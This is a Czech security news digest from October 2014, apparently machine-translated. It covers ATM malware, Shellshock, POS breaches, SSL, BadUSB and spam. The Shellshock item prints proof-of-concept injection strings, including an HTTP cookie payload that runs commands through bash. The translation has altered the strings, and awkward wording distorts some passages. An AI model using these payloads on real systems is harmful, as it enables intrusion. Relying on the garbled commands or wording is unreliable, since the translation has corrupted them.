Kaspersky Lab přinesly zprávu popisující proudy hrozby a trendy vyzvednout v průběhu roku 2013 a 2014 Tato zpráva znovu zdůrazňuje, že počítačová kriminalita není pouze nová forma trestné činnosti, co zde vidíme, je model a struktura tradičního organizovaného zločinu zapouzdřené v technologicky vyspělé formě ". - řekl Dr. Madan Oberoi, ředitel Cyber ​​Inovace & Outreach Interpolu


Infikované bankomaty rozdávat miliony dolarů bez kreditní karty
8.10.2014 Viry
Kaspersky Lab provádí forenzní vyšetřování cybercriminal útoků na několik bankomatů po celém světě. V průběhu tohoto šetření, výzkumníci objevili malware Tyupkin slouží k infikovat bankomatů a umožňují útočníkům odebrat peníze prostřednictvím přímé manipulace, krást miliony dolarů. metodiky útok Zločinci pracovat ve dvou fázích. Za prvé, získat fyzický přístup k bankomatu a vložte bootovací CD pro instalaci Tyupkin malware. Poté, co se restartovat systém, infikovaných ATM je nyní pod jejich kontrolou a malware běží v nekonečné smyčce čeká na povel. Chcete-li podvod těžší rozpoznat, Tyupkin malware přijímá pouze příkazy v určitých časech v neděli a pondělí večer. Během těchto hodin, útočníci jsou schopni ukrást peníze z infikovaného počítače. Videozáznam získané z bezpečnostních kamer z infikovaných bankomatů ukázal metodiku používanou pro přístup k hotovosti z automatů. Unikátní číslice kombinace založené na náhodných čísel je nově vytvořené pro každou relaci. Tím je zajištěno, že žádná osoba mimo gang se mohlo těžit z podvodu. Pak operátor škodlivého obdrží pokyny po telefonu od jiného člena gangu, který zná algoritmus a je schopen generovat klíč relace založené na uvedeném telefonním čísle. Tím je zajištěno, že muly vybírá hotovost nesnažte se jít sám. Když je klíč zadán správně, ATM zobrazí podrobnosti o tom, kolik peněz je k dispozici v každém hotovosti kazety a vyzval provozovatele, aby si vybrat, který kazetu vyloupit. Bankomat pak dávkuje 40 bankovky v době od zvoleného zásobníku.

Tyupkin malware

Na žádost finanční instituce, společnosti Kaspersky Lab Global Research a Analysis Team provedla forenzní vyšetřování této Cyber-kriminální útok. Malware identifikován a pojmenován společností Kaspersky Lab jako Backdoor.MSIL.Tyupkin, dosud byl zjištěn na bankomatech v Latinské Americe, Evropě a Asii. "Za posledních několik let jsme zaznamenali velký vzestup útoků ATM skimming pomocí zařízení a škodlivý software. Nyní jsme svědky přirozený vývoj této hrozby se počítačoví zločinci pohybující se řetěz a zaměření finanční instituce přímo. Toto je děláno tím, že nakazí bankomatů sami, nebo zahájení přímých útoků APT stylu vůči bankám. Tyupkin malware je příklad z útočníků, kteří využívají nedostatků v infrastruktuře ATM, "řekl Vicente Diaz, hlavní bezpečnostní výzkumník ve společnosti Kaspersky Lab. "Důrazně doporučujeme, aby banky zkontrolovat fyzickou bezpečnost svých bankomatů a síťové infrastruktury a zvážit investice do zabezpečení kvality řešení," dodal. "pachatelé jsou neustále identifikovat nové způsoby, jak rozvíjet své metody k páchání trestné činnosti, a to je důležité, že budeme držet vymáhání práva v našich zemích angažováni a informováni o současných trendech a metodách, "řekl Sanjay Virmani, ředitel Centra kriminality INTERPOL Digital. Kaspersky Lab doporučuje následující bankám, aby se zmírnilo riziko:

Zkontrolujte fyzické bezpečnosti všech bankomatů a zvážit investice do bezpečnostních řešení kvality.
Vyměňte všechny zámky a hlavní klíče na horní kapotu bankomatů a příkop výchozí poskytované výrobcem.
Nainstalujte alarm a ujistěte se, že je v dobrém stavu. Fotoaparát Cyber-zločinci stojí za Tyupkin pouze infikovaných bankomatů, které bylo nainstalováno žádné bezpečnostní alarm.
Změňte výchozí heslo systému BIOS.
Ujistěte se, že stroje mají up-to-data antivirovou ochranu.


CloudFlare nabízí bezplatné šifrování SSL
8.10.2014 Bezpečnost
Web výkon a bezpečnost společnost CloudFlare dnes uvedla na trh univerzální SSL, což Secure Socket Layer (SSL) k dispozici pro každého, bez nákladů. "Včera tam bylo asi 2 miliony lokalit SSL aktivní on-line," vysvětluje Matthew Prince, spoluzakladatel a generální ředitel z CloudFlare. "Na konci dne se dnes CloudFlare budou válí zdarma SSL jiný 2000000 - téměř zdvojnásobení velikosti šifrované webu." SSL je kritický kryptografické technologie, která zajišťuje na webu. Protokol udržuje provoz ze sledování nebo změnit vlády, poskytovatelé internetových služeb, či hackery. SSL je základem důvěry on-line, k názoru, že Google nedávno oznámil, že šifrované stránky zařadí vyšší ve výsledcích vyhledávání, než ty, které nepoužívají šifrování. Next Generation webové protokoly jako SPDY a HTTP / 2 vyžaduje SSL. Bohužel, náklady a složitost SSL je to znamenalo, že předtím, než dnes méně než 0,4 procenta z webových stránek byly šifrovány. Nastavení a konfigurace SSL je tradičně obtížné pro správce webů, které vyžadují více kroků: jít na certifikační úřad (CÚ) k ověření identity stránek , nákup zbytečně drahé certifikát, instalaci certifikátu na serveru a neustálou údržbu, aby zůstali před zranitelností. CloudFlare Universal SSL umožňuje stránky nastavit state-of-the art šifrování bez složitosti a nákladů. "Nechtěli jsme jen povolit základní SSL zdarma, jsme umožnili nejmodernější šifrování a dělal to jednoduché a zdarma pro každého," řekl Nick Sullivan, Security Engineering Lead na CloudFlare. "Kryptografické systémy Jedeme jako součást univerzální SSL jsou o generaci napřed, co se používá i na největších internetových gigantů. Tyto certifikáty používají eliptická křivka digitálního podpisu algoritmus (ecdsa) klíče a zajišťuje všechny spoje s CloudFlare stránek mají Perfect Forward Secrecy, a jsou podepsány ecdsa a vysoce bezpečné funkce SHA-256 hash. To je úroveň kryptografických bezpečnostních většina webových správců doslova nemohl koupit. " CloudFlare podporuje SSL, bez dodatečných nákladů na všechny své placené plány protože společnost zahájila před čtyřmi lety. Univerzální SSL rozšiřuje kryptografické ochrany dokonce CloudFlare nejmenších zákazníků. Chcete-li povolit univerzální SSL, stránky musí pouze zaregistrovat CloudFlare je bezplatnou službu - proces, který trvá asi pět minut a nevyžaduje žádné technické znalosti nebo změny webový server na příslušné stránce. CloudFlare automaticky problémy a nasadí certifikát Univerzální SSL do 24 hodin. Jakmile nasazených, šifrované spojení, stejně jako moderních webových protokolů jako SPDY, jsou automaticky podporovány každého moderního webovém prohlížeči. "Význam Univerzální SSL není jen ochrana těchto 2000000 místech, ale skutečnost, že se pohybuje Internet jeden krok blíže k šifrovaným-by-default standardem, "vysvětluje Matthew Prince. "Zatímco malé stránky mohou myslet, že nepotřebují SSL, každá šifrované byte vyměnili on-line dělá to více obtížný pro organizace, které se zaměřují na plyn, cenzor, nebo jinak omezit na internetu. Jsme doufali, že teď, když jsme ukázali, že je to možné na naší úrovni, budou další organizace sledovat a dělat SSL bez nákladů výchozí pro všechny své zákazníky. " U webů, které vyžadují pokročilejší konfigurace SSL, CloudFlare podporuje také vlastní certifikáty z libovolného certifikační autority, plně end-to-end SSL s robustní kontrola certifikátu a klíče SSL - oznámil na začátku tohoto měsíce - což umožňuje weby používají CloudFlare, aniž by se péče o jejich privátních klíčů.


Bash Shellshock chyba: Více útoků, více záplat
8.10.2014 Počítačový útok
Jako prodejci tahanice o vydání patche pro GNU Bash Shellshock chyby a firmy spěchat k jejich provedení, útočníci po celém světě Snímací systémy pro díry se otevře. Počáteční útoky zaměřené na vytváření DDoS botnety řízené přes IRC byly následoval průzkum pokusy v Brazílii a Číně , kde se IP adresy různých institucí (včetně finanční), které byly zkoumány, a poté, co zjistil citlivé na chyby, útočníci "zeptala se" cílové servery pro informace, jako například typ a verzi operačního systému, typ stroje, typ procesoru, atd Předpokládá se, že útočníci se shromažďování informací, které se vám bude hodit pro stahování budoucím útokům. Cisco Systems vydala informační zpravodaj , že vlajky mnoho svých síťových produktů jsou zranitelné, a upozorňuje uživatele vůči aktualizací softwaru opravit chybu. Mají také IPS a Snort podpisy, které dokáže detekovat a blokovat útoky na síťové úrovni, jejichž cílem je zneužití této chyby. Oracle vydala bezpečnostní upozornění s podrobnostmi, které z jejích produktů jsou zranitelné a které ne, a za předpokladu, patche pro malý počet ně. "Oracle se stále vyšetřuje tento problém a bude poskytovat opravy poškozeného výrobku, jakmile byly plně testovány a rozhodl se poskytnout účinné zmírnění proti zranitelnosti," všimli si, a dodal, že uživatelé by měli pravidelně kontrolovat aktualizace. To je také možné, že společnosti jsou zpoždění opravy, dokud všechny otázky týkající se chyby mohou být řešeny. Red Hat bezpečnostní inženýr Huzaifa Sidhpurwala nabídl nějakou představu v tom, jak byla zjištěna jejich první náplast chtějí-li další otázky se vynořily brzy po, a jak šli o vydání druhého opravu. Chet Ramey , aktuální GNU Bash, který oznámil o víkendu, že nový patch, kterým se stanoví jak CVE-2014-7169 a CVE-2014-7169 byl zpřístupněn. Náplast v otázce byl vyvinut Red Hat bezpečnostní produkt výzkumníka Florian Weimer, a to také řeší dva další problémy (CVE-2014-6277 a CVE-2014 - 6278), které by mohly vést ke vzdálenému vykořisťování. Konečně, tady je dobrá proti zápisu up podle SANS ISC CTU Johannes Ullrich, který naléhá na administrátory hlouběji a propojovací systémy, které mohou mít vynechal v jejich počátečním pohybem.


PoS prodejce potvrzuje Jimmy John porušení byla jejich vina
8.10.2014 Incidenty
Signature Systems, dodavatel POS systém, který byl jmenován jako pravděpodobné místo původu na porušení platební údaje Jimmy John je , potvrdil, že útočník (y) získal přístup k zadání uživatelského jména a hesla se společnost používá pro vzdálený přístup pokladní systémy. "neoprávněná osoba používá, aby byl přístup k instalaci malware navržen tak, aby sbírat data z platebních karet z karet, které byly udeřil přes terminály v některých restauracích. malware byl schopen zachytit jméno držitele karty, číslo karty, datum ukončení platnosti a ověřovací kód z magnetického proužku karty, "vysvětluje společnost. Kromě 216 Jimmyho Johnovy prodejen, dalších 108 restauračních míst - většinou máma-a-pop restaurací v Nové Anglii a Midwest (kompletní seznam a po dobu kompromisu zde ) - byly postiženy v jednom bod nebo jiný od června 16 a do poloviny září, kdy poslední malware byl odstraněn z některých zařízení POS. "malware byl navržen tak, aby se zabránilo detekci antivirové programy běžící na systému point-of-prodej, "společnost upozornil, a sdílené, že oni byli nejprve upozorněni na potenciální problém ovlivňující jedno místo restauraci 30. července. "Pracovali jsme tvrdě od té doby zjistit, co se stalo, zablokovat pokračovat, zajistit větší bezpečnostní opatření, a oznámí postižené obchodníci, "uvedly. Podle informací shromážděných Brian Krebs , bezpečnostní standardy PCI Rada schválila instalaci PDQ POS systému podpis Systems, pouze do 28.října 2013, takže některé z postižených restaurací, které tak učinil poté, co toto datum bude pravděpodobně udělena pokuta. Signature Systems v současné době pracuje na vývoji nové platební aplikace, která bude obsahovat point-to-point šifrování s cílem zmařit paměti škrábání malware. Krebs zjistil, že hlavní bezpečnostní důstojníky, firmu, která audit produkt PDQ, nefunguje a už před tím, než zavřeli, měl jeho certifikační autorita zrušit Security Standards Council PCI.


Wordpress databáze zranitelnost
8.10.2014 Zranitelnosti
Již v roce 2012, jsou jemné lidé stojící za konferenci BruCON oznámila, že od vydání své populární akce 2013, zvláštní rozpočet bude přiděleno na podporu tvůrčí myšlení přijít s projekty, které budou mít prospěch INFOSEC komunitu. Projekt byl pojmenován 5by5 a ve svém prvním roce byly čtyři nápady financovány 5000 EUR.

V letošním roce Ryan Dewhurst a tým za populární WPScan open source černé skříňky WordPress zranitelnosti použít finanční prostředky z 5by5 projektu k nastavení databáze WPScan zranitelnosti , on-line verze WPScan datových souborů slouží k detekci WordPress Core plugin a téma zranitelnosti. Každý položka zranitelnost v databázi specifikuje dotčené verzí, poskytuje externí reference s více podrobností o chybě v otázce, stejně jako poskytuje klasifikaci zranitelnosti (in-house WPVDB ID, CVE, CWE a OWASP Top 10 referenční). Databáze má také API je k dispozici pro nekomerční použití. Myšlenkou projektu je využít stávající depozitář Wordpress bezpečnostních chyb postavený v WPScan a aby tyto otázky více viditelné a přístupné pro WordPress správců, uživatelů a celkovou bezpečnostní komunity. autora : Berislav Kucan, provozní ředitel Help Net Security.


Důvěra v cloudu je v historickém minimu
8.10.2014 Cloud
Bezpečnost a důvěra v cloud-based služeb jsou rychle rostoucí zájem o rozhodovací pravomocí v oblasti IT ve velkých organizacích, podle nové globální studie z BT. Zatímco 79 procent dotázaných v USA (70 procent globálně) přijímají cloud skladování a webové aplikace v rámci své podnikatelské činnosti, jejich důvěra kolem cloud bezpečnost je na všech-time nízká. Ale i přes to, 69 procent v USA (50 procent celosvětově) uvádí, že přijaly masový trh služeb "spotřebitel", spíše než, které jsou určeny speciálně pro podnik. Nová studie zkoumá postoje k, a použití, cloud-based služby s rozhodovací pravomocí v oblasti IT z podnikových organizací v jedenácti zemích a regionech po celém světě. To ukazuje, že více než tři čtvrtiny výrobců IT rozhodnutí (82 procent v roce USA, 76 procent globálně) říci, bezpečnost je jejich hlavním zájmem o využívání služeb cloudu. Přibližně polovina respondentů (52 procent v USA, 49 procent na celém světě), přiznají, že jsou "velmi nebo extrémně nervózní" o bezpečnostních dopadech těchto služeb. To je výrazný nárůst o 10 procent v roce 2012 na celém světě z předchozího výzkumu. On se rozhodl pro spotřebitelské řešení přes cloud nabídky šité na míru podniku, 53 procent respondentů v USA (48 procent na celém světě), mám dojem, že cloudové aplikace a služby podniku jsou příliš drahé a 58 procent (44 procent celosvětově) drží přesvědčení, že hmotnost na trhu veřejné cloudové aplikace a služby jsou stejně účinné jako použití, které jsou určeny speciálně pro podnikové uživatele. Již více než polovina (54 procent v USA a na celém světě) rozhodnutí IT výrobců, důvěřovat třetí osoba je také problém. Ve Spojených státech, 40 procent (41 procent v celosvětovém měřítku) respondentů má pocit, že všechny cloud služby jsou ze své podstaty nebezpečné a 22 procent (26 procent v celosvětovém měřítku) dotazovaných uvedlo, že došlo k porušení ochrany dat případ, kdy jejich poskytovatel cloud služba byla . strany na poruchy Mark Hughes, prezident BT bezpečnost, prohlásil: "Přijetí cloudových služeb se výrazně zvýšil po celém světě Organizace se snaží využívat řadu výhod - například škálovatelnost, rychlé nasazení a všeobecného přístupu k síti - tyto služby. . nabídka je zajímavý paradox, že průzkum odhalil - na rozhodovací pravomocí jedné straně jsou obavy o bezpečnost důsledky využití veřejných cloudových služeb, ale na druhé straně, jejich rozhodování při koupi zdá být řízen krátkodobých nákladů vnímání zveme. Tyto rozhodovací pravomocí, aby dále zvážit reputační náklady a dopad na jejich značku porušení Cloud Security. Enterprise cloud aplikace a služby jsou určeny na pomoc podnikům realizovat možnosti v cloudu a zároveň výrazně snižuje riziko. "


Zmatek nad bitovými klíči SSL a 1024
7.10.2014 Bezpečnost
Včera a dnes, příspěvek reddit.org způsobil trochu nejistoty ohledně bezpečnosti 1024 bit RSA klíčů, pokud jsou použity s OpenSSL. Minulost odkázal na prezentaci dané na kryptografické konferenci s tím, že 1024 bitové SSL klíče mohou být zapracovány s mírnými prostředky ("20 minut na notebook"). To bylo navrhl, že to je alespoň z části kvůli chybě v OpenSSL, které se podle příspěvku nepodá náhodné klíče z celého dostupného prostoru.

Vypadá to spíš jako tvrzeními v prezentaci nejsou pravdivé, nebo alespoň ne tak široká šířit podle.

Nicméně, to neznamená, že byste se měli vrátit k používání 1024 bitové klíče. 1024 bitové klíče jsou považovány za slabé, a odhaduje se, že 1024 klíče budou rozděleny snadno v blízké budoucnosti vzhledem k pokroku v oblasti výpočetní techniky, a to i pokud je nalezen žádný Výraznou slabinou algoritmu RSA a jeho provedení. NIST doporučují postupné ukončení 1024 bitové klíče na konci loňského roku.

Tak co byste měli dělat?

- Stop vytváření nových 1024 bitové RSA klíče. Prohlížeče začne považovat za neplatné, a mnoho dalších softwarových komponent tak již činí, nebo budou brzy následovat vedení prohlížeče (nemyslím si, že by hlavní CA podepíše 1024 bitové klíče v tomto okamžiku)
- zásoby stávajících 1024 bitové klíče, které máte, a zvažte jejich výměnu.

Tam mohou být některé odpůrce. Vestavěné systémy (opět) někdy nelze vytvořit klíče větší než 1024 bitů. V tomto případě je třeba se podívat do jiných ovládacích prvků.

S cryptograph obecně použít největší velikost klíče si můžete dovolit, SSL, jsou možnosti pro RSA klíče jsou typicky 2048 a 4096 bitů. Pokud je to možné, má s 4096 bitů.

[1] https://www.reddit.com/r/crypto/
comments/2i9qke/openssl_bug_allows_rsa_1024_key_factorization_in/


CSAM: Patch a dostat pw0ned (ne OR).
7.10.2014 Zranitelnosti
"Patch tak rychle, jak je to možné" Zdá se, že ještě další společné bezpečnostní praxe vedoucí k síti zkázu. Zazděny stroje nemůže být hacknutý snadno, takže to může trochu pomoci s "bezpečností". Ale na druhou stranu, jak insecuredo chcete, aby vaše zařízení, aby se za účelem podpory nejnovější a nejlepší záplatování nástroje.

Pěkný příběh z Lyalc:

" Před několika lety, zranitelnost skenování výrobní prostředí poprvé nachází asi polovina kritických produkčních serverů v tomto platebním prostředí se funkce Ochrana souborů systému Windows zakázat prostřednictvím klíče registru. "

Ok. To by mi sehnal trochu zjizvenou taky. Ochrana souborů systému Windows (WFP) je skvělá vlastnost, aby ty Win2k a 2K3 systémy trochu bezpečnější, a ujistěte se, hacking je dost těžké, že některé skript kiddies nemusí obtěžovat. Líbí se mi to, a nechtěl, aby to, že máte vypnutý vše náhle.

"Netřeba dodávat, že procesy reakce na incidenty kopl velmi rychle.? Během počáteční analýzy, bylo zjištěno, že dotčené servery měli? Náplastí na kritickou platební komponenty, několik týdnů před skenování zranitelnosti.? Tento software, z globální prodejce platebních prostředků, je používán velkou část odvětví platebního styku, což je přirozený cíl pro malware a rootkit dodavatelé. "

Ok. To by mě taky nadšený (a vzrušení nikdy nebyly dobré v oblasti bezpečnosti. Mám rád své bezpečnostní operace být nudné, ...). Platební systémy, myslím, že jsem slyšel o pár případech, kdy napadl. Ano, zdá se, že oprava. Ale co náplast? Jak dlouho byli zranitelní před použitím náplasti? A dobře, obrana do hloubky je určena pro lidi, kteří nemohou dělat incidenty odpověď jako Lyalc coninues?:

... Místo neměl nainstalován FIM, ani se skenování zranitelnosti byly provedeny dříve. [FIM: Forefront Identity Manager]

Tak co se stalo? Jak se to může možná být falešně pozitivní?

Po této linie vyšetřování zjistili, že opravný balíček Instalační bylo zakázání WFP, ale zanedbávají znovu povolit funkci, takže servery náchylné na změny systémových souborů.

Ah! Plátek.?

Jen slovo o záplaty, v týdnu, kdy jsme se zrovna udělal s dobrou řadu vysoce kritických nouzových záplat pro Shellshock: přestat obávat o rychlosti sám. Ztratíte. Přemýšlejte o tom, Shellshock a heartbleed: Nemůžeš opravit podnik dostatečně rychle. Co budete potřebovat místo, je:

dobře promyšlené záplatování proces. Jak jsme na záplatování, jak jsme se vyhnout stanoví systém, jak zajistit, aby se náplast dostal skutečně použity?
komplexní inventarizace. Nelze zajistit (nebo náplast), co nemáte
Pevné ovládací prvky pro detekci útoků a využívány systémy. Musíte viditelnost sítě, aby bylo možné detekovat útoky a co je důležitější, využívaných systémů.


Shellshock: Více informací o uvolněné CVE-2014-6277 a CVE-2014-6278. Také: Má Windows mají problém Shellshock?
6.10.2014 Zranitelnosti
Michal Zalewski se zveřejňovat více podrobností o dvě zranitelnosti objevil v důsledku Shellshock. Použil fuzzer objevit jak zranitelná místa, a nyní zveřejnila PoC využívá pro obě strany. [1]

Chcete-li zjistit, zda jste zranitelní, Michal body tohoto testu řetězec:

foo = '() {echo not patched; } 'Bash-c foo

Rychlý test ukazuje, up-to datum OS X, CentOS a Ubuntu jako nejsou ohroženy.

První z nich, CVE-2014-6277, je více "tradiční" použití neinicializované paměti. Ve většině případů, bude to jen způsobí havárii. Nicméně, to může být také využit k dosažení spuštění libovolného kódu. Ve své podstatě je to opět způsobeno tím, jak jsou funkce analyzován v proměnných prostředí, takže by to bylo využitelné přes HTTP požadavků.

Druhý, CVE-2014-6278, je blíže k původnímu Shellshock chyby. PoC exploit napsal Michal je:

HTTP_COOKIE = '() {_; }> _ [$ ($ ())] {Echo ahoj mami; id;} 'bash-c:

Stejně jako první chyba, parser je zmatená o tom, kde definice funkce skončí, a provede kód v {}.

Koncem minulého týdne, blog post o podobnou chybu v systému Windows navrhl některé, které prostředí Windows je zranitelný stejně [2]. Tato chyba zabezpečení je však poněkud odlišná. Není předán jiné skořápky plodil od původní. Také v systému Windows, je ještě méně pravděpodobné než v Unixu mít cgi-bin skripty volat přímo shell. Jedinou realistickou využít vektor ve Windows i nadále prostředí, jako je cygwin, které instalují bash v systému Windows.

[1] http://lcamtuf.blogspot.com/2014/10/bash-bug-jak-jsme-nakonec-cracked.html
[2] http://thesecurityfactory.be/command vstřikování-windows.html


Testování na otevřené porty s Firewalk technikou
6.10.2014 Bezpečnost
Zajímavý je způsob, jak zjistit, jaké filtry jsou umístěny v bráně konkrétního hostitele. To je nazýváno Firewalk a je založen na IP TTL uplynutí. Algoritmus je následující:

Celá trasa je stanovena pomocí některého z traceroute dostupných technik
Paket je odeslán s TTL rovna vzdálenosti k cíli
V případě, že paketová časový limit, je zlé s TTL, která se rovná vzdálenosti na jedno cílové minus.
Je-li přijato ICMP typ 11 kód 0 (Time-to-Live, překročení), byl paket předán a tak se port není blokován.
Není-li přijata žádná odpověď, port je blokován na bránu.
Pojďme vidět se skutečným příkladem. Zvažte následující diagramu sítě:


Firewalking děje podle následujících kroků:

Traceroute pakety jsou odesílány určit bránu s sestupně TTL:






2. ICMP překročení času zpráva byla doručena od výchozí brány TTL = 2 a TTL = 1 balení, což znamená, že tam jsou dvě brány mezi zemí původu a určení a TTL = 3 je vzdálenost k cíli

3. Několik pakety jsou vysílány s TTL = 3 do cíle různé cílový port. Pořadí je následující: První paket je odeslán s TTL = 3. Pokud dojde k vypršení časového limitu, druhý je odeslán paket s TTL = 1. Je-li typ ICMP 11 kód 0 (Time-to-live překročení) je přijat, brána je předání paketu.

Pojďme viz první paket na port 1 a TTL = 3?:

Timeout dojde, tak stejné je odeslán paket s TTL = 2:

ICMP typ 11 Kód 0 je odeslán z brány směrování cílové hostitele, což znamená, že paket byl předán a port je otevřen:

Jak můžeme použít tuto techniku? Nmap má Firewalk skript, který může být použit. V tomto příkladu je následující příkaz by měl být vydán:

nmap --script = Firewalk --traceroute 172.16.2.165


Detekce nepravidelných programů a služeb nainstalovaných v síti
6.10.2014 Zabezpečení
Když podnikové sítě stává cíl, můžete auditu za dodržování bezpečnostní politiky být náročné, pokud nemáte software řídící nepravidelné používání oprávněními správce udělil, a používá k instalaci neautorizovaného softwaru nebo změnit konfiguraci instalace služby, které by mohly způsobit přerušení v síťová služba. Příklady těchto možných otázek jsou další servery DHCP (IPv4 a IPv6), Dropbox, Spotify nebo ARP skenovací zařízení.

Můžeme použít nmap zjistit všechny protokoly, které vysílá pakety všesměrového vysílání a jsou podporovány packetdecoders.lua:

Ether
ARP požadavky (IPv4)
CDP - Cisco Discovery Protocol
EIGRP - Cisco Enhanced Interior brána Routing Protocol
OSPF - Open Shortest Path First
UDP
DHCP
Netbios
SSDP
HSRP
Dropbox
Logitech Squeezebox Discovery
Multicast DNS / Bonjour / ZeroConf
Spotify
Následující příklad ukazuje, jak použít nmap se vysílání posluchače scénář a my můžeme vidět výsledek zařízení s Dropbox nainstalován, zařízení odesílá ARP dotaz (router v tomto případě) a zařízení odesílání požadavků protokolu DHCPv6:

nmap detekce vysílání skript

nmap detekce vysílání skript

Můžete spustit tento program pravidelně sledovat běžné problémy bezpečnosti ve vaší síti, jen v případě, že váš IPS by mohlo být něco chybí;)


Hackerské nástroje pro zneužití USB už reálně fungují

6.10.2014 Hacking
Nástroje, jež se mohou využít k vykonání nebezpečných útoků prostřednictvím USB, už jsou na světě. A nelze se proti takovým atajkům prakticky nijak bránit.

Dva bezpečnostní experti ve snaze poukázat na nebezpečí USB disků vydali nástroje pro USB ataky.

Vydání nástrojů Adamem Caudillem a Brandonem Wilsonem přichází jen dva měsíce poté, co německá společnost Security Research Labs (SRLabs) demonstrovala na konferenci Black Hat v Las Vegas útok zvaný BadUSB.

V rámci něj bezpečnostní experti ukázali, jak USB disk připojený k počítači může automaticky odesílat údery uživatele na klávesnici útočníkům, stahovat a instalovat škodlivé kódy, či dokonce změnit svůj profil na síťový adaptér a nabourat se tak do nastavení DNS.

Jak tehdy uvedli zaměstnanci SRLabs, útok vyžaduje úpravu firmwaru USB, již lze jednoduše provést přímo z operačního systému. Experti však nevydali žádné nástroje ani nezveřejnili detailní postup, jelikož tuto díru údajně není snadné opravit.

To vedlo Caudilla a Wilsona k tomu, aby se ve snaze porozumět BadUSB a bezpečnostním rizikům, která představuje pro uživatele, o útok pokusili také. Svá zjištění prezentovali v pátek na konferenci Derbycon v americkém Louisville a narozdíl od SRLabs dokonce i vydali potřebné nástroje spolu s dokumentací.

Během demonstrace na Derbyconu, jež je dostupná na Youtube, oba muži ukázali například to, jak na USB disku vytvořit skrytý oddíl, na nějž jsou antivirové programy krátké či jak zjistit hesla ke chráněným oddílům na USB discích, jež tuto funkci nabízejí.

Zveřejněné nástroje fungují u USB disků s ovladačem zvaným Phison 2251-03, lze je však snadno přizpůsobit i pro jiné ovladače od tchajwanské společnosti Phison Electronics. Ty jsou na velké většině USB disků, které jsou v současné době na trhu.

„Opravdu doufáme, že vydáním (těchto nástrojů) přimějeme výrobce, aby trvali na podepsaných firmwarových aktualizacích, a že Phison přidá podporu pro podepsané aktualizace na všechny ovladače, které prodává,“ uvedl Caudill.

„Phison není jediným hráčem na trhu, ale je největší a já bych rád viděl, jak se ujme vedoucí role a bude inspirovat ve zlepšení bezpečnosti USB disků i další firmy.“

Špatnou zprávou je, že proti útoku se nedá nijak bránit. Jednou cestou je, aby výrobci vyžadovali pro USB ovladače podepsané firmwarové aktualizace či zcela zablokovali možnost měnit firmware, jakmile zařízení opustí továrnu. I kdyby to však někteří výrobci udělali, je otázkou, jaký by to mělo efekt, jelikož na trhu i mezi lidmi jsou desítky či stovky milionů USB disků, které mohou být potenciálně nebezpečné.


Obrana před novým virem prakticky neexistuje

4.10.2014 Viry
Bezpečnostní experti společnosti SR Labs Karsten Nohl a Jacob Nell letos v srpnu odhalili bezpečnostní riziko týkající se USB rozhraní. Tento týden o chybě byly prozrazeny všechny detaily, které mohou kybernetickým zločincům posloužit k napadení cizích počítačů. Útok prostřednictvím této trhliny nemají uživatelé navíc šanci zpozorovat.
Útok prostřednictvím této zranitelnosti rozhraní USB nemají uživatelé šanci zpozorovat.
Už srpnové odhalení zranitelnosti udělalo bezpečnostním expertům vrásky na čele. Až doposud si totiž s většinou hrozeb týkajících se rozhraní USB dokázaly antivirové programy poradit, to ale u novinky neplatí.

Výzkumníci Adam Caudill a Brandon Wilson, kteří se hrozbou také zabývali, však na bezpečnostní konferenci Derbycon 4,0 v americkém Louisvillu tento týden odhalili všechny podrobnosti. Tím zároveň dali případným útočníkům silnou zbraň do ruky, upozornil server Security Week.

Bezpečnostní expert Karsten Nohl
Bezpečnostní expert Karsten Nohl pomohl zranitelnost rozhraní USB odhalit.

„Naše víra nám jasně říká, že všechny naše znalosti by měly být veřejné,“ uvedl Caudill na dotaz, proč podrobnosti k chybě vyzradili.

Nohlovi a Nellovi se podařilo vytvořit už v první polovině letošního roku nezvaného návštěvníka, který prakticky nemůže být odhalen. Útok nového viru nazývaného BadUSB je směřován přímo na USB řadič, jenž je umístěn přímo na základní desce a stará se o komunikaci mezi USB zařízením a samotným počítačem.

Standard USB se stal tak běžný, že jsme se jen zřídka starali o bezpečnostní dopady.
Bezpečnostní expert Karsten Nohl
Škodlivý kód je schopen využít toho, že většina těchto čipů nedisponuje žádným zabezpečením. Jednoduše se tedy před bezpečnostními aplikacemi tváří, že se jedná o ovládací software USB řadiče, nikoliv o zákeřný virus. Současné antiviry i firewally jsou proto na něj krátké, uvedl server Security Affairs.

„Standard USB se stal tak běžný, že jsme se jen zřídka starali o bezpečnostní dopady. Většina z nás považovala USB disky po antivirové kontrole za naprosto bezpečné. Až do teď… Libovolnou flešku je možné přeprogramovat tak, aby útočník získal zcela kontrolu nad systémem,“ podotkl již dříve Nohl.

Bezpečnostní experti navíc poukázali na to, že jejich hrozba se dokáže automaticky replikovat a přenášet z jednoho zařízení na druhé. Snadno se tak mohou nakazit všechna USB zařízení, která mají paměť a která se připojí k PC.

Záplaty jen pro novější počítače
Jen zlomek výrobců základních desek od srpna na hrozbu zareagoval a vydal aktualizace ovládacího softwaru (tzv. firmwaru), které eliminují možnost průniku do cizího systému prostřednictvím USB. Záplaty jsou k dispozici navíc jen pro cca dva roky staré stroje. Zbylí uživatelé jsou tak nyní vydáni kybernetickým útočníkům napospas.

Uživatelé by tak měli z preventivních důvodů zkontrolovat dostupné aktualizace pro základní desky svých počítačů a notebooků. V případě, že bude k dispozici update rozhraní USB, neměli by s instalací v žádném případě otálet.

Bezpečností experti se totiž shodují, že když jsou nyní všechny podrobnosti o hrozbě k dispozici, počítačoví piráti se na trhlinu s největší pravděpodobností zaměří.


Spam v srpnu 2014
4.10.2014 Spam
Spam v centru pozornosti

V srpnu, podvodné e-maily využívány globální politické události a jména slavných lidí v Ruské federaci. Škodlivé soubory byly rozšířeny prostřednictvím e-mailu, včetně těch, které napodobovaly soudní předvolání. Spammeři, kteří vydělávají peníze tím, že reklama léky používané populární služby upoutat pozornost příjemců. Spammeři také aktivně inzerována cestovní služby a inkasních agentur.

Škodlivé soudní předvolání

V srpnu jsme zaznamenali několik hromadnou korespondenci napodobovat soudní předvolání v různých jazycích. Anglická jazyková verze informován, že uživatel byl přijata k soudu a měli studovat případové materiály na pomoc podat obranu. Tyto materiály byly údajně v příloze, která ve skutečnosti obsažené Trojan Backdoor.Win32.Kuluoz schopen stáhnout a spustit další malware na oběti počítače. Srovnáním několik e-mailů z jednoho hromadnou korespondenci jsme potvrdili, že některé informace, jako je čas, datum a místo konání jednání, a názvy archivů škodlivých souborů se pohybovaly od e-mailu na e-mail. Odesílatele, adresy byly generovány z jedné šablony, ve které podvodníci prostě vstoupil slova z předem stanoveného seznamu. Změny v textu, který byl určen pro větší individualitu a filtrování spamu bypass.

srpen-2014_spam-report_en_1

